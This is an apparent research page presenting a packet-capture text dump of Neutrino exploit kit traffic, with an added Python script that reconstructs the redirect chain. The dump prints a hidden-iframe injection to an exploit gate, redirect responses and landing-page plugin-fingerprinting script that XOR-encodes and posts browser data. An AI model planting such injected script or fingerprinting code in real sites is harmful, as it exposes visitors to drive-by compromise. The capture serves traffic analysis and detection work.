
Neutrino Web Based Exploit Kit Traffic Sample full PCAP Download

Download Neutrino Exploit Kit Traffic Sample: neutrino

2013-06-18 19:25:23.332815 IP 192.168.122.178.49346 > 173.247.253.210.80: Flags [P.], seq 3764310395:3764310795, ack 3551114755, win 16560, length 400: HTTP: GET /media/system/js/jquery-1.6.5.min.js HTTP/1.1
E…Vi@…….z……..P.^.{….P.@…..GET /media/system/js/jquery-1.6.5.min.js HTTP/1.1
Accept: */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.insightcrime.org
Connection: Keep-Alive
2013-06-18 19:25:23.414570 IP 173.247.253.210.80 > 192.168.122.178.49346: Flags [P.], seq 1:265, ack 400, win 1728, length 264: HTTP: HTTP/1.1 200 OK
E..0.y@.=.[)……z..P…….^..P…>…HTTP/1.1 200 OK
Date: Wed, 19 Jun 2013 00:25:22 GMT
Vary: Accept-Encoding,User-Agent
Server: Apache
Connection: Keep-Alive
Content-Type: application/javascript
Accept-Ranges: bytes
Last-Modified: Wed, 03 Oct 2012 20:33:03 GMT
Transfer-Encoding: chunked
2013-06-18 19:25:23.415601 IP 173.247.253.210.80 > 192.168.122.178.49346: Flags [P.], seq 3025:3441, ack 400, win 1728, length 416: HTTP
E….|@.=.Z…….z..P…….^..P…….vTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://93.171.172.220/?1';
js_kod2.width = '5px';
js_kod2.height = '6px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}
0
2013-06-18 19:25:23.961981 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 591772287:591772759, ack 321085729, win 16560, length 472: HTTP: GET /?1 HTTP/1.1
E…W.@…[…z.]……P#E…#[email protected]…GET /?1 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 93.171.172.220
Connection: Keep-Alive
2013-06-18 19:25:24.346136 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 1:595, ack 472, win 1728, length 594: HTTP: HTTP/1.1 302 Found
E..z .@.=…]…..z..P…#a!#E.WP…hK..HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:35 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://93.171.172.220/?2
Connection: Keep-Alive
Set-Cookie: 4b94b=a%3A2%3A%7Bs%3A6%3A%22groups%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1373401415%3B%7Ds%3A7%3A%22streams%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1373401415%3B%7D%7D; expires=Sat, 20-Jul-2013 00:23:35 GMT; path=/; domain=.93.171.172.220
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:35 GMT
Content-Length: 0

2013-06-18 19:25:24.347331 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 472:944, ack 595, win 16411, length 472: HTTP: GET /?2 HTTP/1.1
E…W.@…[u..z.]……P#E.W.#[email protected]…GET /?2 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 93.171.172.220
Connection: Keep-Alive
2013-06-18 19:25:24.734482 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
E… .@.=..^]…..z..P…#cs#E./P…….HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:36 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:36 GMT
Content-Length: 0
2013-06-18 19:25:24.891153 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 4182278095:4182278653, ack 302450009, win 16560, length 558
E..VW.@….”..z……[email protected]…..YP.@…..GET /aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://[redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
2013-06-18 19:25:24.934786 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
E… .@.=..]]…..z..P…#cs#E./P…….HTTP/1.1 302 Found
Date: Wed, 19 Jun 2013 00:23:36 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 21 Jul 1977 07:30:00 GMT
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0
Last-Modified: Wed, 19 Jun 2013 00:23:36 GMT
Content-Length: 0

2013-06-18 19:25:25.194796 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 1381:2533, ack 558, win 109, length 1152
E…[email protected]………z..@….
..H..P..mrW..etect.getVersion("Flash"),quick_time:PluginDetect.getVersion("QuickTime"),real_player:PluginDetect.getVersion("RealPlayer"),shockwave:PluginDetect.getVersion("Shockwave"),silver_light:PluginDetect.getVersion("Silverlight"),vlc:PluginDetect.getVersion("VLC"),wmp:PluginDetect.getVersion("WMP")},hid:a};var f={};f[b]=c;f[e]=encodeURIComponent(xor(JSON.stringify(a),c));$.post(d,f,function(a){$("body").append(xor(decodeURIComponent(a),c))})}function xor(a,c){for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));return d}
JSON.stringify=JSON.stringify||function(a){var c=typeof a;if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);var d,b,e=[],f=a&&a.constructor==Array;for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));return(f?"[":"{")+String(e)+(f?"]":"}")};
</script>
</head>
<body>
<img src='mgylmdxkq.png'><img src='szqbqjq.png'><img src='txvu.jpg'><img src='plrjx.gif'>
<img src='obzmmphsihjjxs.gif'><img src='tutoogrerinpmdl.gif'><img src='koqavj.gif'>
</body>
</html>
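The packets up to this point show the whole Neutrino chain: the compromised site serves a script that injects a hidden iframe to 93.171.172.220, that gate answers two 302s, and the second one lands the browser on the webhop.org host on port 8000, which then pulls in plg.js (PluginDetect) to fingerprint installed plugins. As an added example that is not part of the original post, the Python below rebuilds that chain from tcpdump -A text: it splits the dump into packets, drops TCP retransmissions (the duplicated 302 above has the same 4-tuple and sequence range as the first copy), extracts requests, 3xx Location targets and Server banners, and lists them in capture order. The SAMPLE string is constructed by condensing packets from this capture with the binary bytes shortened; the function names are my own.

```python
import re

# Constructed sample: tcpdump -A packets condensed from the capture on this page
# (binary payload bytes shortened to "E..."); the second 302 from 93.171.172.220
# is the retransmission that also appears in the original dump.
SAMPLE = """\
2013-06-18 19:25:23.332815 IP 192.168.122.178.49346 > 173.247.253.210.80: Flags [P.], seq 3764310395:3764310795, ack 3551114755, win 16560, length 400: HTTP: GET /media/system/js/jquery-1.6.5.min.js HTTP/1.1
Host: www.insightcrime.org
2013-06-18 19:25:23.414570 IP 173.247.253.210.80 > 192.168.122.178.49346: Flags [P.], seq 1:265, ack 400, win 1728, length 264: HTTP: HTTP/1.1 200 OK
Server: Apache
2013-06-18 19:25:23.961981 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 591772287:591772759, ack 321085729, win 16560, length 472: HTTP: GET /?1 HTTP/1.1
Host: 93.171.172.220
2013-06-18 19:25:24.346136 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 1:595, ack 472, win 1728, length 594: HTTP: HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
LOCATION: http://93.171.172.220/?2
2013-06-18 19:25:24.347331 IP 192.168.122.178.49357 > 93.171.172.220.80: Flags [P.], seq 472:944, ack 595, win 16411, length 472: HTTP: GET /?2 HTTP/1.1
Host: 93.171.172.220
2013-06-18 19:25:24.734482 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
2013-06-18 19:25:24.891153 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 4182278095:4182278653, ack 302450009, win 16560, length 558
E...GET /aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736 HTTP/1.1
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
2013-06-18 19:25:24.934786 IP 93.171.172.220.80 > 192.168.122.178.49357: Flags [P.], seq 595:1045, ack 944, win 1996, length 450: HTTP: HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
LOCATION: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
2013-06-18 19:25:25.491944 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 470:939, ack 382, win 16464, length 469
E...GET /scripts/js/plg.js HTTP/1.1
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
2013-06-18 19:25:25.514078 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2538:2770, ack 1024, win 127, length 232
E...HTTP/1.1 200 OK
Server: nginx/1.4.1
"""

# tcpdump header line: timestamp, src ip.port > dst ip.port, then the seq range
PKT_RE = re.compile(r"^(\S+ \S+) IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags .*?seq (\d+(?::\d+)?)")
REQ_RE = re.compile(r"(GET|POST) (\S+) HTTP/1\.[01]")
STATUS_RE = re.compile(r"HTTP/1\.[01] (\d{3})\b")
HOST_RE = re.compile(r"^Host: (\S+)", re.I)
LOC_RE = re.compile(r"^Location: (\S+)", re.I)     # the gate sends it as LOCATION:
SERVER_RE = re.compile(r"^Server: (.+)", re.I)


def parse_packets(text):
    """Split tcpdump -A output into packets, dropping TCP retransmissions
    (same 4-tuple and same sequence range as a packet already seen)."""
    packets, seen, current = [], set(), None
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            ts, src, sport, dst, dport, seq = m.groups()
            key = (src, sport, dst, dport, seq)
            if key in seen:
                current = None      # retransmission: ignore its payload lines as well
                continue
            seen.add(key)
            current = {"ts": ts, "src": src, "dst": dst, "lines": [line]}
            packets.append(current)
        elif current is not None:
            current["lines"].append(line.strip())
    return packets


def http_events(packets):
    """Reduce each packet to one HTTP event: a request URL, or a status plus Location."""
    events = []
    for p in packets:
        req = status = host = location = None
        for line in p["lines"]:
            req = req or REQ_RE.search(line)
            status = status or STATUS_RE.search(line)
            hm, lm = HOST_RE.match(line), LOC_RE.match(line)
            if hm:
                host = hm.group(1)
            if lm:
                location = lm.group(1)
        if req:
            # No Host header in a truncated packet: fall back to the destination IP
            events.append({"ts": p["ts"], "type": "request", "method": req.group(1),
                           "url": "http://%s%s" % (host or p["dst"], req.group(2))})
        elif status:
            events.append({"ts": p["ts"], "type": "response", "server": p["src"],
                           "status": int(status.group(1)), "location": location})
    return events


def redirect_chain(events):
    """Interleave requests with the 3xx Location targets that produced the next one."""
    hops = []
    for ev in events:
        if ev["type"] == "request":
            hops.append((ev["method"], ev["url"]))
        elif 300 <= ev["status"] < 400 and ev["location"]:
            hops.append((str(ev["status"]), ev["location"]))
    return hops


def server_banners(packets):
    """Map each responding IP to the Server banners it sent (gate vs. landing host)."""
    banners = {}
    for p in packets:
        if not any(STATUS_RE.search(l) for l in p["lines"]):
            continue
        for line in p["lines"]:
            m = SERVER_RE.match(line)
            if m:
                banners.setdefault(p["src"], set()).add(m.group(1).strip())
    return banners


if __name__ == "__main__":
    pkts = parse_packets(SAMPLE)
    for method, url in redirect_chain(http_events(pkts)):
        print("%-4s %s" % (method, url))
    for ip, names in sorted(server_banners(pkts).items()):
        print(ip, sorted(names))
```

Run against a full `tcpdump -A -r neutrino.pcap` dump instead of SAMPLE, the same functions give the analyst the hop list and the per-IP banner table in one pass; the retransmission filter matters because otherwise the duplicated 302 would be reported as a second redirect.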
2013-06-18 19:25:25.245284 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2533:2538, ack 558, win 109, length 5
[email protected]………z..@…..=.H..P..m….0
2013-06-18 19:25:25.245927 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 558:1024, ack 2538, win 16558, length 466
E…W.@….o..z……[email protected][email protected] /zbtsnshkxph.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.249082 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 2188958982:2188959443, ack 145475139, win 16560, length 461
E…W.@….r..z……[email protected]…..CP.@.*…GET /lllpy.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.251600 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 2769999680:2770000146, ack 1604936086, win 16560, length 466
E…W.@….j..z……..@…@[email protected] /gzfkzixuudb.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.251932 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 1718863355:1718863825, ack 702567541, win 16560, length 470
E…W.@….e..z……..@fs..)[email protected]…GET /vctvkgszlijgkz.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive

2013-06-18 19:25:25.254356 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 930960147:930960616, ack 1881382264, win 16560, length 469
E…W.@….c..z……..@7}S.p#[email protected] /mfgvlykftmyoxe.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.254700 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 4016377655:4016378127, ack 2731059312, win 16560, length 472
E…W.@…._..z……[email protected][email protected]…GET /aimwofqjubqlvuzy.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.473545 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 1:301, ack 461, win 108, length 300
[email protected]……z..@…..C.x..P..li…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

63
vjdtmhsoqakgbnfyfpvmjghmfquzhqjdzmwmupblplrqzxpenkqwryjxodxwtgzttwfnlgybsqsrohwbsmxjkghzjevdkvwdrcr
0
2013-06-18 19:25:25.476410 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 461:926, ack 301, win 16485, length 465
E…W.@….5..z……[email protected][email protected] /gmjgrxnqdx.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.480513 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 1:274, ack 466, win 108, length 273
[email protected]………z..@.._.a…..P..l….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

3a
// egmtiykiedbbhgroyvuxqovgxmqkwkpbqbvzafhfjjgqpyfouzmlnir
0

2013-06-18 19:25:25.481853 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 466:932, ack 274, win 16491, length 466
E…W.@….3..z……..@…._.b.P.@k….GET /mvkhymxmmyg.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.490766 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 1:382, ack 470, win 108, length 381
E…’[email protected].$…….z..@..).Tufs..P..l.!..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

b4
lvueskwfdibiatmeubklcanmoesxpfpbajgstcxxkzglttqnuayxbmjpqbmggbhglnzfqxcawjlpccdwccteocteeglkisrtgrywobxlljbnlejogdtvgmzkskvadnukethtvffgogtaldpsginnunxnytobgimlctexyjdnqwobzduglhtg
0
2013-06-18 19:25:25.491944 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 470:939, ack 382, win 16464, length 469
E…W.@…./..z……..@fs..).U.P.@P….GET /scripts/js/plg.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.495471 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 1:376, ack 469, win 108, length 375
E…[email protected]………[email protected]#.x7}T.P..l#…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

a0
// uazzadbvmxwjhnzobjmwnkbctgoohkebleblhdgtaddiqcxsmjpzuqbnxqceahgmlhyskemliptysqreageuxgiuwkyxsejdmhvwmiiuybtqslvssanpgvjcgiaynjbzrxwdgeyegsuzdqsvqfkwauzhdzfqj
0
2013-06-18 19:25:25.496747 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 469:934, ack 376, win 16466, length 465
E…W.@….2..z……..@7}T.p#..P.@R….GET /ynxvcejiqt.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive

2013-06-18 19:25:25.514078 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2538:2770, ack 1024, win 127, length 232
E…[email protected]..(……z..@…..B.H..P….8..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

11
// hswtojuprrajov
0
2013-06-18 19:25:25.515373 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 1024:1490, ack 2770, win 16500, length 466
E…W.@….0..z……[email protected]…..*P.@tx…GET /ircyuaohvzo.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.518191 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 1:327, ack 472, win 108, length 326
[email protected]………z..@…..p.e..P..l….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

7d
qeimcdmsfqtstevlyucckbbqhhdmbfysjhemlreqhyjacemayocjqezxldkmjiesqjebajshibikfvlejnnarnxdrhqaqutheyjeibmqcuaiqmmaaaarnyveglfxg
0
2013-06-18 19:25:25.519401 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 472:936, ack 327, win 16478, length 464
E…W.@….1..z……[email protected]……P.@^….GET /pznggodm.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.720536 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 274:559, ack 932, win 125, length 285
[email protected]………z..@.._.b…..P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

46
// rmiesawjieqnuoaadlymbdgwcqnpopwfbektfhcnltbgibhmngyokelmvycjoyppdzj
0

2013-06-18 19:25:25.722152 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 932:1393, ack 559, win 16420, length 461
E…W.@….3..z……..@…._.c.P.@$.^..GET /urdacn.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.725599 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 376:759, ack 934, win 125, length 383
E…[email protected]………[email protected]#..7}V.P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

a8
// hudybzyxeletroertdbqfbhfuvxelcutxxrzwpwbabvsqzkjclzimhnhdklonghlezkbohdpjyizxsiadiipqvxtgiiuppfupqveyyuiwchuuquxzdnpzkjftrajhgdwxzavxuduwlprbjoancqmnzshqsrxzutwuusro
0
2013-06-18 19:25:25.726879 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 934:1396, ack 759, win 16370, length 462
E…W.@….1..z……..@7}V.p#.nP.?.p…GET /wqqfwaf.js HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
